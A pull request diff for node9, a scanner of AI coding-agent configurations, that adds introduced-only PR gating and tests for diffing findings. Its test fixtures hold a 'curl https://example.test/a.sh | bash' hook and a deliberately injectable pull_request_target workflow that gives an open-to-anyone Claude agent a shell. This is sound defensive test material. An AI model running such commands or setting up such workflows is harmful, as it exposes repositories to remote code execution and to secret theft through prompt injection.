### PR TITLE
CI-5: report what a PR introduced, not what the repo contains

### DIFF
--- a/README.md
+++ b/README.md
@@ -97,13 +97,13 @@ node9 scan-repo <owner/repo> --json    # machine-readable
 
 What it checks:
 
-| Check    | Flags                                                                        |
-| -------- | ---------------------------------------------------------------------------- |
-| **CI-1** | committed agent config that pre-authorizes broad tools or runs remote hooks  |
-| **CI-2** | injectable agent workflows — an outsider can trigger the agent and hijack it |
-| **CI-3** | unpinned / `@latest` MCP servers or inline credentials (supply chain)        |
-| **CI-4** | secrets an injected agent could exfiltrate                                   |
-| **CI-6** | poisoned or dangerous instructions in `CLAUDE.md` / `AGENTS.md` / skills     |
+| Check    | Flags                                                                            |
+| -------- | -------------------------------------------------------------------------------- |
+| **CI-1** | committed agent config that pre-authorizes broad tools or runs remote hooks      |
+| **CI-2** | injectable agent workflows — an outsider can trigger the agent and hijack it     |
+| **CI-3** | unpinned / `@latest` MCP servers or inline credentials (supply chain)            |
+| **CI-4** | secrets an injected agent could exfiltrate                                       |
+| **CI-6** | poisoned or dangerous instructions in `CLAUDE.md` / `AGENTS.md` / `.cursorrules` |
 
 **Gate every PR** — the same engine as a GitHub Action, so a hijackable config can't get merged:
 
@@ -112,7 +112,13 @@ What it checks:
 - uses: node9-ai/node9-proxy@v2
   with:
     fail-on: high # or 'never' to just comment
+    fail-on-scope: introduced # only what THIS PR added; 'all' (default) judges the whole repo
 ```
+
+`fail-on-scope: introduced` is what makes the gate adoptable on a repository that already
+has findings: the PR comment leads with what the change introduced, pre-existing findings
+stay listed but do not block, and a base commit that cannot be read falls back to judging
+everything rather than passing.
 
 Marketplace: **[node9 Agent Security](https://github.com/marketplace/actions/node9-agent-security)**
 

--- a/action.yml
+++ b/action.yml
@@ -10,6 +10,18 @@ inputs:
     description: 'Fail the check when the worst finding is at least this severity: never | medium | high | critical'
     required: false
     default: 'never'
+  fail-on-scope:
+    description: >-
+      Which findings the gate judges: "all" (the repo as it stands, the default and the
+      pre-CI-5 behaviour) or "introduced" (only what this PR added or made worse). Use
+      "introduced" to turn the gate on for a repository that is already dirty. When the
+      base commit cannot be read the scan falls back to "all" rather than passing.
+    required: false
+    default: 'all'
+  annotate:
+    description: 'Annotate the findings inline on the PR diff'
+    required: false
+    default: 'true'
   comment:
     description: 'Post a sticky comment on the PR with the findings'
     required: false
@@ -36,15 +48,33 @@ runs:
       with:
         node-version: '20'
 
+    # CI-5: the base side. `actions/checkout` fetches depth 1, so the PR's base commit is
+    # NOT in the object store — one extra shallow fetch of that single SHA is all the diff
+    # needs. A failure here is deliberately non-fatal: the scan then reports that it could
+    # not read the base, which degrades the gate to the strict absolute answer.
+    - name: Fetch the base commit
+      if: github.event.pull_request.base.sha != ''
+      shell: bash
+      run: |
+        git -C "$GITHUB_WORKSPACE" fetch --no-tags --depth=1 origin \
+          "${{ github.event.pull_request.base.sha }}" 2>/dev/null \
+          || echo "node9: could not fetch the base commit — the scan will report every finding."
+
     - name: Run node9 agent-security scan
       id: scan
       shell: bash
+      env:
+        NODE9_BASE_SHA: ${{ github.event.pull_request.base.sha }}
       run: |
         set -euo pipefail
         # Static, config-only scan of the checked-out workspace. Never fails this
         # step on a finding (the gate is applied by comment.js per fail-on).
-        npx -y "node9-ai@${{ inputs.node9-version }}" scan-repo "$GITHUB_WORKSPACE" --json \
-          > "${RUNNER_TEMP}/node9-result.json" || true
+        # `--base` is passed whenever the event has one, INCLUDING when the fetch above
+        # failed: an unreadable base must be reported as such, not silently skipped.
+        BASE_ARGS=()
+        if [ -n "${NODE9_BASE_SHA:-}" ]; then BASE_ARGS=(--base "$NODE9_BASE_SHA"); fi
+        npx -y "node9-ai@${{ inputs.node9-version }}" scan-repo "$GITHUB_WORKSPACE" \
+          "${BASE_ARGS[@]}" --json > "${RUNNER_TEMP}/node9-result.json" || true
         echo "result=${RUNNER_TEMP}/node9-result.json" >> "$GITHUB_OUTPUT"
 
     - name: Comment + gate
@@ -53,5 +83,7 @@ runs:
         GITHUB_TOKEN: ${{ inputs.github-token }}
         NODE9_RESULT: ${{ steps.scan.outputs.result }}
         NODE9_FAIL_ON: ${{ inputs.fail-on }}
+        NODE9_FAIL_ON_SCOPE: ${{ inputs.fail-on-scope }}
         NODE9_COMMENT: ${{ inputs.comment }}
+        NODE9_ANNOTATE: ${{ inputs.annotate }}
       run: node "${GITHUB_ACTION_PATH}/comment.js"

--- a/comment.js
+++ b/comment.js
@@ -19,10 +19,13 @@ const ICON = { critical: '🔴', high: '🔴', medium: '🟡', advisory: '🟢' 
 
 /** Decide the check-run conclusion + process exit from the worst severity and
  *  the fail-on threshold. `never` = report-only (never fails). */
-function decide(worst, failOn) {
+function decide(worst, failOn, incomplete = false) {
   const threshold = RANK[failOn]; // undefined for 'never'/unknown → never fail
   const fail = !!(threshold && worst && RANK[worst] >= threshold);
-  const conclusion = fail ? 'failure' : worst ? 'neutral' : 'success';
+  // A scan that could not read every file has not earned a green check. It does not FAIL
+  // the gate (we have no evidence of a problem), but it must not report success either —
+  // "nothing found" is a statement about what we read, not about the change.
+  const conclusion = fail ? 'failure' : worst || incomplete ? 'neutral' : 'success';
   return { fail, conclusion, exitCode: fail ? 1 : 0 };
 }
 
@@ -171,7 +174,8 @@ function renderComment(result) {
   const findings = trusted ? annotatable(result) : all;
   const worst = trusted ? d.worstIntroduced : result.worst;
   const L = [MARKER];
-  if (trusted && findings.length === 0) {
+  // An incomplete scan can never take the green branch, however little it found.
+  if (trusted && findings.length === 0 && !d.incomplete && !result.incomplete) {
     L.push('### 🛡️ node9 agent-security · ✅');
     L.push('');
     L.push(
@@ -187,6 +191,12 @@ function renderComment(result) {
     L.push('');
     L.push(renderDetail(result));
     return L.join('\n');
+  }
+  if (d && trusted && (d.incomplete || result.incomplete)) {
+    L.push(
+      '<sub>⚠️ This scan could not read every file, so it cannot claim the change introduced nothing — treat the list below as partial.</sub>'
+    );
+    L.push('');
   }
   if (d && !trusted) {
     L.push(
@@ -331,7 +341,11 @@ async function main() {
   const scope = (process.env.NODE9_FAIL_ON_SCOPE || 'all').toLowerCase();
   const wantComment = (process.env.NODE9_COMMENT || 'true') !== 'false';
   const { prNumber, headSha } = readEvent();
-  const { fail, conclusion, exitCode } = decide(gateWorst(result, scope), failOn);
+  const { fail, conclusion, exitCode } = decide(
+    gateWorst(result, scope),
+    failOn,
+    !!(result.incomplete || (result.diff && result.diff.incomplete))
+  );
 
   // Inline annotations, on the file the reviewer is already looking at. Printed before the
   // API calls so they still land if commenting fails.
@@ -359,7 +373,7 @@ async function main() {
       (result.diff
         ? ` · introduced=${result.diff.worstIntroduced ?? 'none'} (base ${result.diff.base})`
         : '') +
-      ` · fail-on=${failOn}/${scope} · ${fail ? 'FAILING' : 'ok'}`
+      ` · fail-on=${failOn}/${scope} · ${fail ? 'FAILING' : conclusion === 'neutral' ? conclusion : 'ok'}`
   );
   return exitCode;
 }
@@ -472,6 +486,38 @@ function selftest() {
     'critical',
     'no diff in the result → gate on the repo worst, never on nothing'
   );
+
+  // An incomplete scan must never post a green check, on either scope.
+  assert.strictEqual(
+    decide(null, 'high', true).conclusion,
+    'neutral',
+    'incomplete → neutral, never success'
+  );
+  assert.strictEqual(
+    decide(null, 'high', false).conclusion,
+    'success',
+    'complete + clean → success'
+  );
+  const partial = withDiff(
+    {
+      base: 'ok',
+      added: [],
+      escalated: [],
+      unchanged: [],
+      removed: [],
+      worstIntroduced: null,
+      incomplete: true,
+    },
+    []
+  );
+  partial.worst = null;
+  partial.incomplete = true;
+  const partialComment = renderComment(partial);
+  assert.ok(
+    !partialComment.includes('introduces no agent-security findings'),
+    'a partial scan never claims the PR introduced nothing'
+  );
+  assert.ok(partialComment.includes('could not read every file'), 'a partial scan says so');
 
   // Annotations follow the same scope.
   const introducedOnly = withDiff(

--- a/comment.js
+++ b/comment.js
@@ -26,6 +26,38 @@ function decide(worst, failOn) {
   return { fail, conclusion, exitCode: fail ? 1 : 0 };
 }
 
+/** Which severity the gate judges. `all` (the default) keeps the pre-CI-5 behaviour
+ *  exactly: the repo's worst finding. `introduced` narrows it to what THIS change is
+ *  answerable for, which is what lets a repo that is already dirty turn the gate on today.
+ *
+ *  The scan already degrades `worstIntroduced` to the head's absolute worst when the base
+ *  could not be read, so an unreadable base falls back to the strict answer here rather
+ *  than passing as "nothing new". Missing diff (an older CLI than this action) → `all`. */
+function gateWorst(result, scope) {
+  if (scope !== 'introduced' || !result.diff) return result.worst;
+  return result.diff.worstIntroduced ?? null;
+}
+
+/** The findings a reviewer should be annotated about: what this change introduced, or
+ *  everything when there is no trustworthy diff. */
+function annotatable(result) {
+  const d = result.diff;
+  if (!d || d.base !== 'ok') return Array.isArray(result.findings) ? result.findings : [];
+  return [...(d.added || []), ...(d.escalated || []).map((e) => e.finding)];
+}
+
+/** GitHub workflow commands: one annotation per finding, on the file in the PR diff.
+ *  No API call and no `checks: write` permission needed — the runner parses stdout.
+ *  Findings carry no line number today, so these anchor at the file (line 1); adding
+ *  real line numbers to the checks upgrades these in place. */
+function annotationLines(result) {
+  const level = { critical: 'error', high: 'error', medium: 'warning', advisory: 'notice' };
+  return annotatable(result).map(
+    (f) =>
+      `::${level[f.severity] || 'notice'} file=${f.file},line=${f.line || 1},title=node9 ${f.rule || f.check}::${String(f.title).replace(/\r?\n/g, ' ')}`
+  );
+}
+
 /** Derive a one-line, severity-TIERED threat sentence from the anchor finding (+ its
  *  same-file companions, so a CI-2 injection + a CI-4 secret on one file tell ONE story).
  *  Derived from severity + check + signals — NEVER a fixed scary template — so it cannot
@@ -129,9 +161,41 @@ function renderDetail(result) {
 /** Render the sticky comment: lead with the ATTACK STORY (threat → mechanism → single fix),
  *  raw findings collapsed into <details>. Same ScanResult data, reframed for impact. */
 function renderComment(result) {
-  const findings = Array.isArray(result.findings) ? result.findings : [];
-  const worst = result.worst;
+  const all = Array.isArray(result.findings) ? result.findings : [];
+  const d = result.diff;
+  const trusted = d && d.base === 'ok';
+  // CI-5: when we know what this change introduced, the comment is about THAT. A reviewer
+  // cannot act on the repo's accumulated history, and burying the one new finding under
+  // twelve old ones is how a gate gets muted. Pre-existing findings stay in the comment —
+  // collapsed inside <details>, never deleted.
+  const findings = trusted ? annotatable(result) : all;
+  const worst = trusted ? d.worstIntroduced : result.worst;
   const L = [MARKER];
+  if (trusted && findings.length === 0) {
+    L.push('### 🛡️ node9 agent-security · ✅');
+    L.push('');
+    L.push(
+      `**This PR introduces no agent-security findings.**` +
+        ((d.removed || []).length ? ` It also fixes ${d.removed.length}.` : '')
+    );
+    if ((d.unchanged || []).length) {
+      L.push('');
+      L.push(
+        `<sub>${d.unchanged.length} pre-existing finding(s) in this repo were not introduced here and are not gated.</sub>`
+      );
+    }
+    L.push('');
+    L.push(renderDetail(result));
+    return L.join('\n');
+  }
+  if (d && !trusted) {
+    L.push(
+      d.base === 'did-not-run'
+        ? '<sub>⚠️ Could not read the base commit, so nothing below can be called new — every finding in this repo is listed. A shallow clone is the usual cause.</sub>'
+        : '<sub>⚠️ The base scan could not read every file, so a finding missing from it would look new — every finding in this repo is listed.</sub>'
+    );
+    L.push('');
+  }
   if (findings.length === 0) {
     L.push('### 🛡️ node9 agent-security · ✅');
     L.push('');
@@ -151,7 +215,16 @@ function renderComment(result) {
           ? 'Medium — hardening'
           : 'Advisory — note';
 
-  L.push(`### 🛡️ node9 agent-security · ${ICON[worst] ?? '🟢'} ${tier}`);
+  L.push(
+    `### 🛡️ node9 agent-security · ${ICON[worst] ?? '🟢'} ${tier}` +
+      (trusted ? ` · introduced by this PR` : '')
+  );
+  if (trusted && (d.escalated || []).length) {
+    L.push('');
+    L.push(
+      `_${d.escalated.length} of these already existed and this PR widens them — a guardrail was removed, not added._`
+    );
+  }
   L.push('');
   L.push(`**${threatLine(anchor, companions)}**`);
   const mech = mechanism(anchor, companions);
@@ -255,9 +328,16 @@ async function main() {
 
   const repo = process.env.GITHUB_REPOSITORY;
   const failOn = (process.env.NODE9_FAIL_ON || 'never').toLowerCase();
+  const scope = (process.env.NODE9_FAIL_ON_SCOPE || 'all').toLowerCase();
   const wantComment = (process.env.NODE9_COMMENT || 'true') !== 'false';
   const { prNumber, headSha } = readEvent();
-  const { fail, conclusion, exitCode } = decide(result.worst, failOn);
+  const { fail, conclusion, exitCode } = decide(gateWorst(result, scope), failOn);
+
+  // Inline annotations, on the file the reviewer is already looking at. Printed before the
+  // API calls so they still land if commenting fails.
+  if ((process.env.NODE9_ANNOTATE || 'true') !== 'false') {
+    for (const line of annotationLines(result)) console.log(line);
+  }
 
   if (wantComment && prNumber) {
     try {
@@ -275,7 +355,11 @@ async function main() {
   }
 
   console.log(
-    `node9 agent-security: worst=${result.worst ?? 'clean'} · fail-on=${failOn} · ${fail ? 'FAILING' : 'ok'}`
+    `node9 agent-security: worst=${result.worst ?? 'clean'}` +
+      (result.diff
+        ? ` · introduced=${result.diff.worstIntroduced ?? 'none'} (base ${result.diff.base})`
+        : '') +
+      ` · fail-on=${failOn}/${scope} · ${fail ? 'FAILING' : 'ok'}`
   );
   return exitCode;
 }
@@ -310,6 +394,161 @@ function selftest() {
     renderComment({ worst: null, findings: [] }).includes('No agent-security findings'),
     'clean copy'
   );
+
+  // ── CI-5 scoping ──────────────────────────────────────────────────────────
+  const f = (severity, over = {}) => ({
+    severity,
+    title: 'X',
+    file: 'w.yml',
+    check: 'CI-2',
+    rule: 'CI-2.injectable-workflow',
+    signals: ['s'],
+    fix: 'do y',
+    ...over,
+  });
+  const withDiff = (diff, findings) => ({ worst: 'critical', findings, inspected: ['a'], diff });
+
+  // The default scope must behave EXACTLY as it did before CI-5 existed.
+  assert.strictEqual(
+    gateWorst(
+      withDiff(
+        {
+          base: 'ok',
+          added: [],
+          escalated: [],
+          unchanged: [f('critical')],
+          removed: [],
+          worstIntroduced: null,
+        },
+        [f('critical')]
+      ),
+      'all'
+    ),
+    'critical',
+    'scope=all still gates on the repo worst (no behaviour change for existing users)'
+  );
+  // A dirty repo whose PR introduces nothing must pass — the whole adoptability argument.
+  assert.strictEqual(
+    gateWorst(
+      withDiff(
+        {
+          base: 'ok',
+          added: [],
+          escalated: [],
+          unchanged: [f('critical')],
+          removed: [],
+          worstIntroduced: null,
+        },
+        [f('critical')]
+      ),
+      'introduced'
+    ),
+    null,
+    'scope=introduced ignores pre-existing findings'
+  );
+  // An unreadable base must NOT read as "nothing new": the scan degrades worstIntroduced
+  // to the absolute worst, and the gate must honour it.
+  assert.strictEqual(
+    gateWorst(
+      withDiff(
+        {
+          base: 'did-not-run',
+          added: [],
+          escalated: [],
+          unchanged: [f('critical')],
+          removed: [],
+          worstIntroduced: 'critical',
+        },
+        [f('critical')]
+      ),
+      'introduced'
+    ),
+    'critical',
+    'an unreadable base falls back to the strict answer'
+  );
+  // An older CLI emits no diff; asking for the narrow gate must not silently open it.
+  assert.strictEqual(
+    gateWorst({ worst: 'critical', findings: [f('critical')] }, 'introduced'),
+    'critical',
+    'no diff in the result → gate on the repo worst, never on nothing'
+  );
+
+  // Annotations follow the same scope.
+  const introducedOnly = withDiff(
+    {
+      base: 'ok',
+      added: [f('high', { file: 'new.yml' })],
+      escalated: [],
+      unchanged: [f('critical')],
+      removed: [],
+      worstIntroduced: 'high',
+    },
+    [f('critical'), f('high', { file: 'new.yml' })]
+  );
+  const anns = annotationLines(introducedOnly);
+  assert.strictEqual(anns.length, 1, 'only the introduced finding is annotated');
+  assert.match(
+    anns[0],
+    /^::error file=new\.yml,line=1,title=node9 CI-2\.injectable-workflow::/,
+    'workflow-command shape'
+  );
+  assert.strictEqual(
+    annotationLines({ worst: 'high', findings: [f('high'), f('medium')] }).length,
+    2,
+    'no diff → annotate everything'
+  );
+
+  // A clean PR on a dirty repo reads GREEN, and still shows the pile collapsed.
+  const cleanPr = renderComment(
+    withDiff(
+      {
+        base: 'ok',
+        added: [],
+        escalated: [],
+        unchanged: [f('critical')],
+        removed: [f('medium')],
+        worstIntroduced: null,
+      },
+      [f('critical')]
+    )
+  );
+  assert.ok(cleanPr.includes('introduces no agent-security findings'), 'clean-PR headline');
+  assert.ok(cleanPr.includes('It also fixes 1'), 'fixes are credited');
+  assert.ok(cleanPr.includes('pre-existing'), 'the pile is still disclosed');
+  assert.ok(cleanPr.includes('<details>'), 'the pile is still listed, collapsed');
+
+  // An untrustworthy base must never render as clean.
+  const blind = renderComment(
+    withDiff(
+      {
+        base: 'did-not-run',
+        added: [],
+        escalated: [],
+        unchanged: [f('critical')],
+        removed: [],
+        worstIntroduced: 'critical',
+      },
+      [f('critical')]
+    )
+  );
+  assert.ok(!blind.includes('introduces no agent-security findings'), 'no false all-clear');
+  assert.ok(blind.includes('Could not read the base commit'), 'says why it cannot compare');
+
+  // Erosion is named as erosion.
+  const eroded = renderComment(
+    withDiff(
+      {
+        base: 'ok',
+        added: [],
+        escalated: [{ finding: f('high'), from: 'medium', to: 'high' }],
+        unchanged: [],
+        removed: [],
+        worstIntroduced: 'high',
+      },
+      [f('high')]
+    )
+  );
+  assert.ok(eroded.includes('widens them'), 'escalation is called out as a removed guardrail');
 
   // threatLine() — LOAD-BEARING honesty guards (overclaiming here undoes the trust the
   // scanner calibration bought). Derived + severity-tiered.

--- a/src/__tests__/ci-check-diff.spec.ts
+++ b/src/__tests__/ci-check-diff.spec.ts
@@ -1,0 +1,233 @@
+// CI-5 — the base-vs-head diff corpus.
+//
+// WRITTEN BEFORE THE IMPLEMENTATION (CLAUDE.md: corpus before code). Every case below
+// is a shape a real pull request produces; the adversarial ones are the point, because
+// the failure mode of a diff is not "misses a finding" — it is "calls a pre-existing
+// finding NEW", which burns the reviewer's trust in one PR.
+//
+// The load-bearing assertions:
+//   1. identity survives edits elsewhere in the file (line/content shift ≠ new finding);
+//   2. a severity ESCALATION on the same finding is neither "added" nor "unchanged" —
+//      it is guardrail erosion, which is what CI-5 was designed to catch;
+//   3. a base scan that could not run degrades to the ABSOLUTE answer, never to "nothing new".
+
+import { describe, it, expect } from 'vitest';
+import fs from 'fs';
+import path from 'path';
+import { scanTree } from '../ci-check';
+import { diffScans, fingerprintOf } from '../ci-check/diff';
+import type { RepoFile, ScanResult } from '../ci-check/types';
+
+const FX = path.join(__dirname, 'fixtures', 'ci-check');
+const fx = (name: string) => fs.readFileSync(path.join(FX, name), 'utf8');
+
+/** Build the RepoTree shape `scanRepo` hands to `scanTree` — the real caller input. */
+const tree = (files: RepoFile[], notes: string[] = []) => ({
+  source: 'owner/repo',
+  files,
+  notes,
+});
+const scan = (files: RepoFile[], notes: string[] = []): ScanResult => scanTree(tree(files, notes));
+
+// ── Reusable repo-surface content ─────────────────────────────────────────────
+const WORKFLOW = '.github/workflows/claude-review.yml';
+const SETTINGS = '.claude/settings.json';
+const MCP = '.mcp.json';
+
+// The critical tier: pull_request_target + PR-head checkout + an ungated agent with a
+// shell. This is the state a repo that "is already red" is actually in.
+const injectableWorkflow = fx('injectable-pr-target.yml');
+
+const mcpWith = (servers: Record<string, unknown>) =>
+  JSON.stringify({ mcpServers: servers }, null, 2);
+
+const unpinnedServer = { command: 'npx', args: ['-y', '@acme/search-mcp'] };
+const pinnedServer = { command: 'npx', args: ['-y', '@acme/search-mcp@1.4.2'] };
+
+const settingsWith = (extra: Record<string, unknown>) =>
+  JSON.stringify({ permissions: { allow: ['Bash(*)'] }, ...extra }, null, 2);
+
+describe('CI-5 · fingerprint identity', () => {
+  it('is stable across content edits elsewhere in the same file', () => {
+    // A real PR almost always touches other lines of the file it changes. If identity
+    // moves when unrelated lines move, every edited file reports its findings as NEW.
+    const base = scan([{ path: MCP, content: mcpWith({ search: unpinnedServer }) }]);
+    const head = scan([
+      {
+        path: MCP,
+        content: JSON.stringify(
+          { $comment: 'added by this PR', mcpServers: { search: unpinnedServer } },
+          null,
+          4 // different indentation too — the bytes of the file differ substantially
+        ),
+      },
+    ]);
+
+    expect(base.findings).toHaveLength(1);
+    expect(head.findings).toHaveLength(1);
+    expect(fingerprintOf(head.findings[0])).toBe(fingerprintOf(base.findings[0]));
+
+    const d = diffScans(base, head);
+    expect(d.added).toHaveLength(0);
+    expect(d.removed).toHaveLength(0);
+    expect(d.unchanged).toHaveLength(1);
+  });
+
+  it('separates the same rule firing in two different files', () => {
+    const s = scan([
+      { path: MCP, content: mcpWith({ search: unpinnedServer }) },
+      { path: '.cursor/mcp.json', content: mcpWith({ search: unpinnedServer }) },
+    ]);
+    expect(s.findings).toHaveLength(2);
+    expect(fingerprintOf(s.findings[0])).not.toBe(fingerprintOf(s.findings[1]));
+  });
+
+  it('separates two servers in one file, and follows a rename as remove + add', () => {
+    const base = scan([{ path: MCP, content: mcpWith({ search: unpinnedServer }) }]);
+    const head = scan([{ path: MCP, content: mcpWith({ lookup: unpinnedServer }) }]);
+
+    const d = diffScans(base, head);
+    expect(d.added).toHaveLength(1);
+    expect(d.removed).toHaveLength(1);
+    expect(d.unchanged).toHaveLength(0);
+    expect(d.added[0].title).toContain('lookup');
+    expect(d.removed[0].title).toContain('search');
+  });
+
+  it('does not collapse two identical findings in one file into one', () => {
+    // Two hooks running the same unpinned command produce two findings whose natural
+    // key is identical. A set-based diff that drops one silently under-reports.
+    const twoIdenticalHooks = JSON.stringify({
+      hooks: {
+        PreToolUse: [
+          { hooks: [{ command: 'curl https://example.test/a.sh | bash' }] },
+          { hooks: [{ command: 'curl https://example.test/a.sh | bash' }] },
+        ],
+      },
+    });
+    const s = scan([{ path: SETTINGS, content: twoIdenticalHooks }]);
+    expect(s.findings).toHaveLength(2);
+    expect(new Set(s.findings.map(fingerprintOf)).size).toBe(2);
+  });
+});
+
+describe('CI-5 · classification', () => {
+  it('reports a finding this PR introduced as added, not as part of the pile', () => {
+    const base = scan([{ path: MCP, content: mcpWith({}) }]);
+    const head = scan([{ path: MCP, content: mcpWith({ search: unpinnedServer }) }]);
+
+    const d = diffScans(base, head);
+    expect(d.added).toHaveLength(1);
+    expect(d.worstIntroduced).toBe('medium');
+  });
+
+  it('reports a fix as removed and introduces nothing', () => {
+    const base = scan([{ path: MCP, content: mcpWith({ search: unpinnedServer }) }]);
+    const head = scan([{ path: MCP, content: mcpWith({ search: pinnedServer }) }]);
+
+    const d = diffScans(base, head);
+    expect(d.removed).toHaveLength(1);
+    expect(d.added).toHaveLength(0);
+    expect(d.worstIntroduced).toBeNull();
+  });
+
+  it('leaves a pre-existing finding out of "introduced" so a dirty repo can adopt the gate', () => {
+    // The whole adoptability argument: a repo that is already red must be able to turn
+    // the gate on today. Pre-existing criticals must NOT count as introduced.
+    const files = [{ path: WORKFLOW, content: injectableWorkflow }];
+    const base = scan(files);
+    const head = scan(files);
+
+    const d = diffScans(base, head);
+    expect(head.worst).toBe('critical'); // the repo IS red
+    expect(d.unchanged.length).toBeGreaterThan(0);
+    expect(d.added).toHaveLength(0);
+    expect(d.worstIntroduced).toBeNull(); // …and the gate still passes
+  });
+
+  it('flags a severity escalation on the SAME finding as erosion, not as unchanged', () => {
+    // Removing the deny backstop does not create a new finding — it makes the existing
+    // one worse. Classifying that as "unchanged" lets a guardrail removal merge silently.
+    const base = scan([
+      {
+        path: SETTINGS,
+        content: settingsWith({ permissions: { allow: ['Bash(*)'], deny: ['Bash(rm:*)'] } }),
+      },
+    ]);
+    const head = scan([{ path: SETTINGS, content: settingsWith({}) }]);
+
+    const baseFinding = base.findings.find((f) => f.check === 'CI-1');
+    const headFinding = head.findings.find((f) => f.check === 'CI-1');
+    expect(baseFinding?.severity).toBe('medium');
+    expect(headFinding?.severity).toBe('high');
+    expect(fingerprintOf(headFinding!)).toBe(fingerprintOf(baseFinding!));
+
+    const d = diffScans(base, head);
+    expect(d.added).toHaveLength(0);
+    expect(d.unchanged).toHaveLength(0);
+    expect(d.escalated).toHaveLength(1);
+    expect(d.escalated[0].from).toBe('medium');
+    expect(d.escalated[0].to).toBe('high');
+    expect(d.worstIntroduced).toBe('high'); // erosion must be gateable
+  });
+
+  it('does not call a de-escalation an introduction', () => {
+    const base = scan([{ path: SETTINGS, content: settingsWith({}) }]);
+    const head = scan([
+      {
+        path: SETTINGS,
+        content: settingsWith({ permissions: { allow: ['Bash(*)'], deny: ['Bash(rm:*)'] } }),
+      },
+    ]);
+
+    const d = diffScans(base, head);
+    expect(d.added).toHaveLength(0);
+    expect(d.escalated).toHaveLength(0);
+    expect(d.worstIntroduced).toBeNull();
+  });
+
+  it('counts a second broad allow in the same file as the same finding', () => {
+    const base = scan([
+      { path: SETTINGS, content: JSON.stringify({ permissions: { allow: ['Bash(*)'] } }) },
+    ]);
+    const head = scan([
+      {
+        path: SETTINGS,
+        content: JSON.stringify({ permissions: { allow: ['Bash(*)', 'Write(*)'] } }),
+      },
+    ]);
+
+    const d = diffScans(base, head);
+    expect(d.added).toHaveLength(0);
+    expect(d.unchanged).toHaveLength(1);
+  });
+});
+
+describe('CI-5 · a base that could not run', () => {
+  const head = () => scan([{ path: WORKFLOW, content: injectableWorkflow }]);
+
+  it('degrades to the absolute answer when there is no base scan at all', () => {
+    const d = diffScans(null, head());
+
+    expect(d.base).toBe('did-not-run');
+    // The trap this guards: `added.length === 0` must never read as "nothing new".
+    expect(d.worstIntroduced).toBe('critical');
+    expect(d.worstIntroduced).toBe(head().worst);
+  });
+
+  it('degrades when the base scan ran but could not read every file', () => {
+    // A rate-limited base makes every unseen finding look introduced. Same guard.
+    const partialBase = scan([], ['GitHub rate limit — the scan may be INCOMPLETE']);
+    expect(partialBase.incomplete).toBe(true);
+
+    const d = diffScans(partialBase, head());
+    expect(d.base).toBe('incomplete');
+    expect(d.worstIntroduced).toBe('critical');
+  });
+
+  it('reports base ok when both scans are complete', () => {
+    const d = diffScans(scan([]), head());
+    expect(d.base).toBe('ok');
+    expect(d.worstIntroduced).toBe('critical'); // genuinely introduced here
+  });
+});

--- a/src/__tests__/ci-check-diff.spec.ts
+++ b/src/__tests__/ci-check-diff.spec.ts
@@ -225,6 +225,27 @@ describe('CI-5 · a base that could not run', () => {
     expect(d.worstIntroduced).toBe('critical');
   });
 
+  it('does not present an INCOMPLETE head scan as a clean pass', () => {
+    // The mirror of the base guard, and the one this diff originally missed: if the HEAD
+    // scan could not read every file, "nothing introduced" is not a fact about the change,
+    // it is a fact about what we managed to read. The absolute path already says this with
+    // exit code 3; the narrow path must not lose it.
+    const incompleteHead = scan([], ['GitHub rate limit — the scan may be INCOMPLETE']);
+    const d = diffScans(scan([]), incompleteHead);
+
+    expect(d.base).toBe('ok');
+    expect(d.worstIntroduced).toBeNull(); // nothing was found in what we DID read…
+    expect(d.incomplete).toBe(true); // …but the answer is not "clean"
+  });
+
+  it('marks a diff complete when both sides read everything', () => {
+    expect(diffScans(scan([]), scan([])).incomplete).toBe(false);
+  });
+
+  it('marks a diff incomplete when the base could not be read', () => {
+    expect(diffScans(null, scan([])).incomplete).toBe(true);
+  });
+
   it('reports base ok when both scans are complete', () => {
     const d = diffScans(scan([]), head());
     expect(d.base).toBe('ok');

--- a/src/__tests__/ci-check.spec.ts
+++ b/src/__tests__/ci-check.spec.ts
@@ -2307,6 +2307,7 @@ describe('scan-repo closing CTA (presentation only — no scan logic)', () => {
   // Minimal ScanResult builders so we test the renderer in isolation.
   const finding = (severity: import('../ci-check/types').Severity) => ({
     check: 'CI-1',
+    rule: 'CI-1.broad-allow',
     dimension: 'workflows' as const,
     severity,
     title: 'test finding',

--- a/src/__tests__/fixtures/ci-check/injectable-pr-target.yml
+++ b/src/__tests__/fixtures/ci-check/injectable-pr-target.yml
@@ -1,0 +1,20 @@
+# The critical tier of CI-2, in the shape the scanner was built for: an anonymous
+# stranger's PR text steers an agent that holds base-repo secrets and a shell.
+# Mirrors `node9-ai/agent-security-demo`'s vulnerable-example.yml.
+name: claude review
+on:
+  pull_request_target:
+jobs:
+  review:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: write
+      id-token: write
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - uses: anthropics/claude-code-action@v1
+        with:
+          allowed_non_write_users: "*"
+          claude_args: '--allowedTools "Bash"'

--- a/src/ci-check/agent-config.ts
+++ b/src/ci-check/agent-config.ts
@@ -51,6 +51,10 @@ export function analyzeAgentConfig(path: string, content: string): CiFinding[] {
     const high = remoteExec || unpinned;
     findings.push({
       check: 'CI-1',
+      rule: 'CI-1.hook-remote-code',
+      // Identity is the command itself: the same hook keeps its identity when its
+      // severity changes (pinned → unpinned), and two different hooks stay distinct.
+      locator: cmd,
       dimension: 'toolRules',
       severity: high ? 'high' : 'medium',
       title: high
@@ -82,6 +86,9 @@ export function analyzeAgentConfig(path: string, content: string): CiFinding[] {
     const hasBackstop = deny.some((d) => /Bash|Write|Edit/.test(d));
     findings.push({
       check: 'CI-1',
+      rule: 'CI-1.broad-allow',
+      // File-level: one finding per config file. Adding a SECOND broad allow makes the
+      // same statement about the same file, so it must not read as a new finding.
       dimension: 'toolRules',
       severity: hasBackstop ? 'medium' : 'high',
       title: hasBackstop

--- a/src/ci-check/codex.ts
+++ b/src/ci-check/codex.ts
@@ -48,6 +48,10 @@ export function analyzeCodexConfig(path: string, content: string): CiFinding[] {
     ].filter((s): s is string => s !== null);
     findings.push({
       check: 'CI-1',
+      // One finding per Codex config; `danger-full-access` vs `approval_policy = never`
+      // are two severities of the same statement, so tightening one is a de-escalation
+      // of THIS finding rather than the removal of one and the arrival of another.
+      rule: 'CI-1.codex-unsafe-defaults',
       dimension: 'toolRules',
       severity: fullAccess ? 'high' : 'medium',
       title: fullAccess

--- a/src/ci-check/diff.ts
+++ b/src/ci-check/diff.ts
@@ -84,6 +84,7 @@ export function diffScans(base: ScanResult | null | undefined, head: ScanResult)
       unchanged: [...head.findings],
       escalated: [],
